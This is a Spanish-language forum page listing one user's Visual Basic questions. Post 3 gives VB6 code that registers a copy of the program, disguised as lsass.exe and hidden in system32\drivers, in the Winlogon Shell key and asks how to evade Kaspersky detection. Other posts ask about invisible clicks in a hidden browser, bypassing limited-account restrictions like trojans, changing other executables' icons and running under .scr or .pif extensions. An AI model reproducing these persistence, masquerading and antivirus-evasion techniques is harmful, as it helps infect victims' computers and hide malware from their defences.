elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Temas
Páginas: [1] 2 3
1  Programación / Programación Visual Basic / Como detectar si responde un proceso en: 19 Octubre 2009, 15:35 pm
Buenas,

Estuve buscando bastante en google de como detectar si un proceso esta respondiendo pero no encontre para vb6 sino que para vb net.. dejo el codigo para ver si ayuda de algo

Código
  1. procs = Process.GetProcessesByName("IEXPLORE")
  2.  
  3.    Try
  4.        If procs(0).Responding = True Then
  5.            MessageBox.Show("IEXPLORE está respondiendo")
  6.        Else
  7.            MessageBox.Show("IEXPLORE no está respondiendo")
  8.        End If
  9.    Catch
  10.         MessageBox.Show("IEXPLORE no está ejecutándose")
  11.    End Try

Ahora el tema es que necesito hacerlo en VB6.. alguien me podria dar una idea de como poder hacerlo?

Muchas gracias.
Saludos
2  Programación / Programación Visual Basic / Detectar la extension del archivo? en: 21 Mayo 2009, 06:06 am
Buenas...

Como pordria hacer para detectar la extension de su mismo archivo?

La ruta es App.Path... el nombre es App.EXEName .. pero necesito saber la extension.. ya que podria cambiarlo a .com .pif o .scr y no seria .exe.. por eso no lo dejaria estatico digamos..

Saludos!
3  Programación / Programación Visual Basic / Indetectabilizar unas lineas en vb en: 4 Marzo 2009, 15:51 pm
Buenas,

el pedazo de codigo que detecta es:

Código
  1. Reg_Crea_KeyConValor HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "Explorer.exe, " & Environ("WinDir") & "\system32\drivers\lsass.exe"
  2. FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("WinDir") & "\system32\drivers\lsass.exe" 'lo copiamos
  3. SetAttr Environ("WinDir") & "\system32\drivers\lsass.exe", vbHidden + vbReadOnly + vbSystem
  4. DoEvents
  5. Shell Environ("WinDir") & "\system32\drivers\lsass.exe" 'y lo ejecutamos

Les digo las combinaciones que detecta:

cuando FileCopy no esta no lo detecta, cuando reg_crea_keyconvalor y shell no estan tampoco lo detecta, cuando solo le cambio el nombre al FileCopy digamos le cambio el lsass no lo detecta, intente ponerlo en funcion para que saque de ahi el nombre, tambien intente ponerlo con strreverse.. nadap.. alguna solucion?

Saludos!

PD: el Antivirus es el Kaspersky
4  Programación / Programación Visual Basic / Realizar tabs en un webbrowser mediante SendMessage en: 27 Febrero 2009, 19:27 pm
Buenas...

He estado intentando realizar tabs para seleccionar otros links mediante sendmessage.. pero no me ha funcionado.. hago el click y no realiza ninguna accion.. dejo el source a ver si alguien encuentra el error..

Form:
Código
  1. Private Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Integer, ByVal wMsg As Integer, ByVal wParam As Integer, ByVal lParam As String) As Long
  2. Private Const WM_KEYDOWN = &H100
  3. Private Const WM_KEYUP = &H101
  4. Private Const VK_TAB = &H9
  5.  
  6. Private Sub Command1_Click()
  7. Dim hwnd As Long
  8. hwnd = GetBrowserHandle(Me.hwnd)
  9. SendMessage hwnd, WM_KEYDOWN, VK_TAB, 0&
  10. 'SendMessage hWnd, WM_KEYUP, VK_TAB, 0&
  11. End Sub
  12.  
  13. Private Sub Form_Load()
  14. WebBrowser1.Navigate "http://www.google.com"
  15. End Sub

Modulo:
Código
  1.      Private Declare Function GetClassName Lib "user32.dll" Alias "GetClassNameA" ( _
  2.          ByVal hwnd As Long, _
  3.          ByVal lpClassName As String, _
  4.          ByVal nMaxCount As Long _
  5.      ) As Long
  6.  
  7.      Private Declare Function EnumChildWindows Lib "user32.dll" ( _
  8.          ByVal hWndParent As Long, _
  9.          ByVal lpEnumFunc As Long, _
  10.          ByVal lParam As Long _
  11.      ) As Long
  12.  
  13.      Private hWndIE As Long
  14.  
  15.  
  16.      Private Function EnumChildProc(ByVal hwnd As Long, ByVal lParam As Long) As Long
  17.          Dim sClassName As String
  18.          sClassName = String(255, vbNullChar)
  19.          Call GetClassName(hwnd, sClassName, 255)
  20.          sClassName = Left$(sClassName, InStr(sClassName, vbNullChar) - 1)
  21.          If sClassName <> "Internet Explorer_Server" Then
  22.              EnumChildProc = 1
  23.          Else
  24.              hWndIE = hwnd
  25.          End If
  26.      End Function
  27.  
  28.      Public Function GetBrowserHandle(ByVal hWndParent) As Long
  29.          hWndIE = 0
  30.          Call EnumChildWindows(hWndParent, AddressOf EnumChildProc, 1)
  31.          GetBrowserHandle = hWndIE
  32.      End Function
  33.  
  34.  


Encuentra el handle y todo del webbrowser pero no se porke no realiza los tabs en la pagina..

Saludos!
5  Programación / Programación Visual Basic / Realizar un Click en el webbrowser en: 15 Febrero 2009, 15:06 pm
Buenas,

Estuve tratando largo rato de poder realizar un click en el webbrowser... pero de forma escondida y sin utilizar webbrowser1.document.elobjeto.click ya que por ese medio es inalcanzable ya lo he intentado..

Hay alguna forma de "mandar" un click a un lugar especifico del webbrowser  (estando escondido el form)?

Saludos!

PD: No me digan que utilize winsock o Inet ya lo he probado y no me sirve para lo que lo quiero..
6  Programación / Programación Visual Basic / Saltando restricciones de cuenta limitada en: 18 Noviembre 2008, 01:14 am
Buenas... se me ha presentado un problemilla :P

Hay alguna manera de saltarse las restricciones con vb asi como lo hacen los troyanos como por ejemplo bifrost? que por mas que tengan los usuarios una cuenta limitada se copian sin problemas en disco:\windows\system32

Saludos!
7  Programación / Programación Visual Basic / Alguna manera de deshacerse de msvbvm60.dll? en: 16 Noviembre 2008, 15:53 pm
Buenas...

Hay alguna manera de deshacerse de la dll que utiliza vb? y solo utilizar apis?

No necesito el formulario ni nada solo necesito que realice funciones que tranquiamente se pueden hacer con apis

Saludos!
8  Programación / Programación Visual Basic / Crear un PE Editor simple.. en: 27 Septiembre 2008, 20:57 pm
Hola! estuve buscando algun ejemplo o algo pero no encontre ninguno en vb.. alguno tiene por ahi algun ejemplo? o alguien que me guie para iniciar nomas..

salu2! y gracias de antemano!
9  Programación / Programación Visual Basic / Mandar click en: 20 Septiembre 2008, 01:42 am
Hola! bueno les hago una pregunta a ver si alguien me sabe responder.. hay alguna forma de hacer un click "virtual" en un lugar del form invisible o sea por ejemplo..

tengo un navegador en todo el form y quiero hacer click en alguna parte del navegador PERO siendo invisible el form y que no se mueva el mouse ni nada o sea sin setcursorpos

salu2! y desde ya muchas gracias!
10  Programación / Programación Visual Basic / Cambiar icono en: 11 Septiembre 2008, 14:59 pm
Hola! alguien tiene algun modulo para cambiar los iconos de los otros exe's que funcione bien? estuve buscando.. encontre algun que otro pero no me funcionaban bien..

Desde ya muchas gracias..

Salu2!!
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines